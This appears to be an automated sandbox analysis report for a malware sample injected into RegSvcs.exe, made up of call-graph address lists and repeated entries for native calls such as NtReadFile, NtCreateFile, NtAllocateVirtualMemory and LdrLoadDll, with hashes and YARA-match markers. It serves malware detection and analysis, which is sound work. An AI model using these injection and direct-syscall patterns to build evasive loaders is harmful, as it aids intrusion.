419fc0 99902->100063 99904 40f505 99904->99421 99906 41a010 2 API calls 99907 40f52e 99906->99907 99907->99421 99909 41af60 LdrLoadDll 99908->99909 99910 41a02c 99909->99910 100069 f42d10 LdrInitializeThunk 99910->100069 99911 40c385 99911->99427 99911->99430 99914 41af60 LdrLoadDll 99913->99914 99915 41a07c 99914->99915 100070 f42d30 LdrInitializeThunk 99915->100070 99916 40c459 99916->99438 99919 41af60 LdrLoadDll 99918->99919 99920 419e3c 99919->99920 100071 f42fb0 LdrInitializeThunk 99920->100071 99921 40c4ac 99921->99442 99923->99885 99924->99883 99926 4087ba 99925->99926 99927 407ea0 4 API calls 99925->99927 99928 408a3f 99926->99928 99931 408a49 99926->99931 99933 419f00 2 API calls 99926->99933 99935 41a490 LdrLoadDll NtClose 99926->99935 99938 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99926->99938 99941 419e20 2 API calls 99926->99941 99944 419d10 99926->99944 99947 4085d0 99926->99947 99959 40f5f0 LdrLoadDll NtClose 99926->99959 99960 419d90 LdrLoadDll 99926->99960 99961 419dc0 LdrLoadDll 99926->99961 99962 419e50 LdrLoadDll 99926->99962 99963 4083a0 99926->99963 99979 405f60 LdrLoadDll 99926->99979 99927->99926 99929 408160 2 API calls 99928->99929 99929->99931 99931->99890 99933->99926 99935->99926 99938->99926 99941->99926 99943->99892 99945 419d2c 99944->99945 99946 41af60 LdrLoadDll 99944->99946 99945->99926 99946->99945 99948 4085e6 99947->99948 99980 419880 99948->99980 99950 4085ff 99955 408771 99950->99955 100001 4081a0 99950->100001 99952 4086e5 99953 4083a0 11 API calls 99952->99953 99952->99955 99954 408713 99953->99954 99954->99955 99956 419f00 2 API calls 99954->99956 99955->99926 99957 408748 99956->99957 99957->99955 99958 41a500 2 API calls 99957->99958 99958->99955 99959->99926 99960->99926 99961->99926 99962->99926 99964 4083c9 99963->99964 100041 408310 99964->100041 99967 41a500 2 API calls 99968 4083dc 99967->99968 99968->99967 99969 408467 99968->99969 99971 408462 99968->99971 100049 40f670 99968->100049 99969->99926 99970 41a490 2 API calls 99972 40849a 99970->99972 99971->99970 99972->99969 99973 419d10 LdrLoadDll 99972->99973 99974 4084ff 99973->99974 99974->99969 100053 419d50 99974->100053 99976 408563 99976->99969 99977 414a50 8 API calls 99976->99977 99978 4085b8 99977->99978 99978->99926 99979->99926 99981 41bf90 2 API calls 99980->99981 99982 419897 99981->99982 100008 409310 99982->100008 99984 4198b2 99985 4198f0 99984->99985 99986 4198d9 99984->99986 99989 41bd40 2 API calls 99985->99989 99987 41bdc0 2 API calls 99986->99987 99988 4198e6 99987->99988 99988->99950 99990 41992a 99989->99990 99991 41bd40 2 API calls 99990->99991 99992 419943 99991->99992 99998 419be4 99992->99998 100014 41bd80 99992->100014 99995 419bd0 99996 41bdc0 2 API calls 99995->99996 99997 419bda 99996->99997 99997->99950 99999 41bdc0 2 API calls 99998->99999 100000 419c39 99999->100000 100000->99950 100002 40829f 100001->100002 100003 4081b5 100001->100003 100002->99952 100003->100002 100004 414a50 8 API calls 100003->100004 100006 408222 100004->100006 100005 408249 100005->99952 100006->100005 100007 41bdc0 2 API calls 100006->100007 100007->100005 100009 409335 100008->100009 100010 40acf0 LdrLoadDll 100009->100010 100011 409368 100010->100011 100013 40938d 100011->100013 100017 40cf20 100011->100017 100013->99984 100035 41a580 100014->100035 100018 40cf4c 100017->100018 100019 41a1e0 LdrLoadDll 100018->100019 100020 40cf65 100019->100020 100021 40cf6c 100020->100021 100028 41a220 100020->100028 100021->100013 100025 40cfa7 100026 41a490 2 API calls 100025->100026 100027 40cfca 100026->100027 100027->100013 100029 41af60 LdrLoadDll 100028->100029 100030 41a23c 100029->100030 100034 f42ca0 LdrInitializeThunk 100030->100034 100031 40cf8f 100031->100021 100033 41a810 LdrLoadDll 100031->100033 100033->100025 100034->100031 100036 41af60 LdrLoadDll 100035->100036 100037 41a59c 100036->100037 100040 f42f90 LdrInitializeThunk 100037->100040 100038 419bc9 100038->99995 100038->99998 100040->100038 100042 408328 100041->100042 100043 40acf0 LdrLoadDll 100042->100043 100044 408343 100043->100044 100045 414e50 LdrLoadDll 100044->100045 100046 408353 100045->100046 100047 40835c PostThreadMessageW 100046->100047 100048 408370 100046->100048 100047->100048 100048->99968 100050 40f683 100049->100050 100056 419e90 100050->100056 100054 419d6c 100053->100054 100055 41af60 LdrLoadDll 100053->100055 100054->99976 100055->100054 100057 419eac 100056->100057 100058 41af60 LdrLoadDll 100056->100058 100061 f42dd0 LdrInitializeThunk 100057->100061 100058->100057 100059 40f6ae 100059->99968 100061->100059 100062->99899 100064 41af60 LdrLoadDll 100063->100064 100065 419fdc 100064->100065 100068 f42f30 LdrInitializeThunk 100065->100068 100066 40f4fe 100066->99904 100066->99906 100068->100066 100069->99911 100070->99916 100071->99921 100074 f42ad0 LdrInitializeThunk

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                              APIs
                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: 1JA$rMA$rMA
                                              • API String ID: 2738559852-782607585
                                              • Opcode ID: 2bcfa5d65d9573b26b3e33ae4ea13c2f556b4b708f08e720f083719c2516736e
                                              • Instruction ID: 5704d444c9a681b3f39da08869587e9243c7ef971719e299f8a38ef4a60bff6a
                                              • Opcode Fuzzy Hash: 2bcfa5d65d9573b26b3e33ae4ea13c2f556b4b708f08e720f083719c2516736e
                                              • Instruction Fuzzy Hash: 65F0F9B2200208AFCB14CF99CC81DEB77B9EF8C714F158249BE1DA7281C630E815CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                              APIs
                                              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: 1JA$rMA$rMA
                                              • API String ID: 2738559852-782607585
                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 213 41a3b2-41a3b7 214 41a366-41a3b1 call 41af60 NtCreateFile 213->214 215 41a3b9-41a3d6 213->215 217 41a3dc-41a409 215->217 218 41a3d7 call 41af60 215->218 218->217
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 8efec6e44dc698eec9951299026959adaba86ed1d631192e92aab1561c944f7a
                                              • Instruction ID: 338cd8c57e588010ebc5483cb84e055cf275db3877901499fa950e8292c19751
                                              • Opcode Fuzzy Hash: 8efec6e44dc698eec9951299026959adaba86ed1d631192e92aab1561c944f7a
                                              • Instruction Fuzzy Hash: 6421E2B2200109AFCB08DF99DC84EEB77ADFF8C754B198249FA1D97201C634E851CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 251 40acf0-40ad0c 252 40ad14-40ad19 251->252 253 40ad0f call 41cc50 251->253 254 40ad1b-40ad1e 252->254 255 40ad1f-40ad2d call 41d070 252->255 253->252 258 40ad3d-40ad4e call 41b4a0 255->258 259 40ad2f-40ad3a call 41d2f0 255->259 264 40ad50-40ad64 LdrLoadDll 258->264 265 40ad67-40ad6a 258->265 259->258 264->265
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                              • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                              • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 266 41a35d-41a3b1 call 41af60 NtCreateFile
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 7a45d6ae788db9e16833ef7516da9c2ca651db3035982463cec0875b6c020445
                                              • Instruction ID: 19b06899d22ee086b1a4e413135bbf3f31700dd3998549fc0d6a61bc8cc82621
                                              • Opcode Fuzzy Hash: 7a45d6ae788db9e16833ef7516da9c2ca651db3035982463cec0875b6c020445
                                              • Instruction Fuzzy Hash: 73F0BDB2211108AFDB08CF89DC85EEB77A9EF8C754F158249FA4DA7240C630E851CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 41a360-41a3b1 call 41af60 NtCreateFile
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 274 41a48a-41a48f 275 41a491-41a4b9 call 41af60 NtClose 274->275 276 41a4e6-41a4fd 274->276
                                              APIs
                                              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: e83987559c24aa4cbfb8af17e34449eaec97245f5ecb04832107a4bb156b80a1
                                              • Instruction ID: 772cff9336b2568b5a1ec9fc72c0e449053b31823f448549a08a06aff1604530
                                              • Opcode Fuzzy Hash: e83987559c24aa4cbfb8af17e34449eaec97245f5ecb04832107a4bb156b80a1
                                              • Instruction Fuzzy Hash: 98F05EB6204118ABD720EF98DC80EE7776DEFC8720F148559FA4C9B201D634E9548BA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 280 41a53a-41a556 281 41a55c-41a57d NtAllocateVirtualMemory 280->281 282 41a557 call 41af60 280->282 282->281
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: dd05064c647e35fe8c3ff48318745f474e3236e2a256cbed23ea78274870518b
                                              • Instruction ID: 7f0dfb6ffeeae57bb9f02b2716c3195dddf053b08dd4caa37995cd82433c9f23
                                              • Opcode Fuzzy Hash: dd05064c647e35fe8c3ff48318745f474e3236e2a256cbed23ea78274870518b
                                              • Instruction Fuzzy Hash: 30F0F8B1200108AFDB14DF99CC80EEB77A9EF9C654F158259BA0DD7251D631E811CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 283 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                              APIs
                                              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 36ff3882400ace974d5e329c6bd73c3d38c201901d57fae081ac7dd8a24459e8
                                              • Instruction ID: 80409421892e31b42671070849e21a4757da64aba816de44bbc4786a6df39f34
                                              • Opcode Fuzzy Hash: 36ff3882400ace974d5e329c6bd73c3d38c201901d57fae081ac7dd8a24459e8
                                              • Instruction Fuzzy Hash: 60900225211400130205B5584704507004687D5392355C032F6016550DDA2589666521
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 797bc59718ef627bdd5fa162f4435e9b6d8f6be57c2b8bb16a72b6aae7bd0209
                                              • Instruction ID: 8d1a73394d696e7c06cf2a8c25fe0dcb875a940fa85374568840550982e16323
                                              • Opcode Fuzzy Hash: 797bc59718ef627bdd5fa162f4435e9b6d8f6be57c2b8bb16a72b6aae7bd0209
                                              • Instruction Fuzzy Hash: 0E90023120140812D2807158840464A000587D1342F95C026B5026654ECE198B5E7BA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cb04eeb86ffd26700ff2ad25cf69da1f208b0312195a98db1886a3998e44d37b
                                              • Instruction ID: 49aa612af89466bcb05e7fbe590fe5cbc991d268114c9f914b41d692bb8888ec
                                              • Opcode Fuzzy Hash: cb04eeb86ffd26700ff2ad25cf69da1f208b0312195a98db1886a3998e44d37b
                                              • Instruction Fuzzy Hash: C190026120240013420571588414616400A87E0342B55C032F6015590EC92989967525
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7189b180e7b3e2036c5d53ea3bfe27c1f6eee17ed44df55a09781a583554ab77
                                              • Instruction ID: efb662dbc60051f2f03619e64b374086f1c149a3eee541dfb0d32210b0cdc6dc
                                              • Opcode Fuzzy Hash: 7189b180e7b3e2036c5d53ea3bfe27c1f6eee17ed44df55a09781a583554ab77
                                              • Instruction Fuzzy Hash: 3C90023120140412D20075989408646000587E0342F55D022BA025555FCA6989967531
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 96fb8aa759906637c58c61dc0c02e1646e07baa0f1f50a50d3a522202aa2f1d5
                                              • Instruction ID: e2d001f032973aaf099a111bed84c510ffa25238a778397bf39c2e163caf99f8
                                              • Opcode Fuzzy Hash: 96fb8aa759906637c58c61dc0c02e1646e07baa0f1f50a50d3a522202aa2f1d5
                                              • Instruction Fuzzy Hash: DB90023120148812D2107158C40474A000587D0342F59C422B9425658E8A9989967521
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1dc9dfe61f2082efd172a83bac8ecdf0fd46e047b1d1dc1bc64e6df40acf954f
                                              • Instruction ID: 0ea0a3c3ba237b9a090a840328cb6db441812e66e5ca36b902bbe8e4d02b7e58
                                              • Opcode Fuzzy Hash: 1dc9dfe61f2082efd172a83bac8ecdf0fd46e047b1d1dc1bc64e6df40acf954f
                                              • Instruction Fuzzy Hash: B190023120140423D21171588504707000987D0382F95C423B5425558E9A5A8A57B521
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 55013114ac84083c452684ffa5d524d536291ae1335c8254782b9929ad13456a
                                              • Instruction ID: 3572493fe8926dee6dbc1b8697437752d8c27da76d5eb0254e84c4313c9fd740
                                              • Opcode Fuzzy Hash: 55013114ac84083c452684ffa5d524d536291ae1335c8254782b9929ad13456a
                                              • Instruction Fuzzy Hash: 72900221242441625645B1588404507400697E0382795C023B6415950D892A995BEA21
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 33b02bb3507f956e882ecf309ca85e3aca13f1f2b4665f9a68e473e242280148
                                              • Instruction ID: 59b28951de550ec60acf5f2df9c7e0b1e61bcff47a6bb6492fe0c86af9da8ef7
                                              • Opcode Fuzzy Hash: 33b02bb3507f956e882ecf309ca85e3aca13f1f2b4665f9a68e473e242280148
                                              • Instruction Fuzzy Hash: F590022130140013D240715894186064005D7E1342F55D022F5415554DDD19895B6622
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2fd95219ad0beaafc88afe1c4f3957294ace92129adbbadef3d92fc9a63bc0b0
                                              • Instruction ID: 2478a9a459d24a5db9845aa7296c20fbbb7f6a4eaae9a7c6f83f07f5d97ad7b5
                                              • Opcode Fuzzy Hash: 2fd95219ad0beaafc88afe1c4f3957294ace92129adbbadef3d92fc9a63bc0b0
                                              • Instruction Fuzzy Hash: 9790022921340012D2807158940860A000587D1343F95D426B5016558DCD19896E6721
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e8aa98687457ce20ad3af28801dbe48359a23f1b94ee14da4faf7adbf7d4e73e
                                              • Instruction ID: 564de64730fd053bb3735daba7dac60f5aa88ab60136a8fbcd88eb41f840b934
                                              • Opcode Fuzzy Hash: e8aa98687457ce20ad3af28801dbe48359a23f1b94ee14da4faf7adbf7d4e73e
                                              • Instruction Fuzzy Hash: 7D90027120140412D24071588404746000587D0342F55C022BA065554F8A5D8EDA7A65
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8b1bd9cca746fee7d612a2986a13bcbe0c6f124520a11a0089031cc2930229ce
                                              • Instruction ID: 493da6847166d4b8900136d45ee4247303143fd7f71cda1d81b53e0c823790ff
                                              • Opcode Fuzzy Hash: 8b1bd9cca746fee7d612a2986a13bcbe0c6f124520a11a0089031cc2930229ce
                                              • Instruction Fuzzy Hash: 0190022160140512D20171588404616000A87D0382F95C033B6025555FCE298A97B531
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 5933f3930915bd013af2f0a5eec7f92e6eead9f14fa2bfceaaee0e112d09371e
                                              • Instruction ID: 82280913514711a53d781cc7560ff5fc1b10b4467b3c4a450749353652f1ba94
                                              • Opcode Fuzzy Hash: 5933f3930915bd013af2f0a5eec7f92e6eead9f14fa2bfceaaee0e112d09371e
                                              • Instruction Fuzzy Hash: 36900221211C0052D30075688C14B07000587D0343F55C126B5155554DCD1989666921
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c04fc5f721b6dbc26b5090217b4c6fa7db56987e78589bf9dbbbf59494666d21
                                              • Instruction ID: 6f57004cd5d25e39226c0b8f620c8caaca83e4391f30b415a8dfeeca3b77eea1
                                              • Opcode Fuzzy Hash: c04fc5f721b6dbc26b5090217b4c6fa7db56987e78589bf9dbbbf59494666d21
                                              • Instruction Fuzzy Hash: 5F9002216014005242407168C8449064005ABE1352755C132B5999550E895D896A6A65
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: bba800ee377deab5a1ce361d4fc18cbd3ba51c4bc15ab6120bec63dd9a77d6ca
                                              • Instruction ID: 3343897a99ede88c94fc7692d5d0bd329c319613f763f4f56344dbdd0dbd2061
                                              • Opcode Fuzzy Hash: bba800ee377deab5a1ce361d4fc18cbd3ba51c4bc15ab6120bec63dd9a77d6ca
                                              • Instruction Fuzzy Hash: A090023120180412D2007158881470B000587D0343F55C022B6165555E8A2989567971
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c752576c4293d7c1f21d15afa141b1973c4613e1372e179c5f73c72abdea0840
                                              • Instruction ID: 57ef6db869e850a837e057a6449ab47f5614ba924eeebcc49645bfb7006162e3
                                              • Opcode Fuzzy Hash: c752576c4293d7c1f21d15afa141b1973c4613e1372e179c5f73c72abdea0840
                                              • Instruction Fuzzy Hash: DC90026134140452D20071588414B060005C7E1342F55C026F6065554E8A1DCD577526

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                              APIs
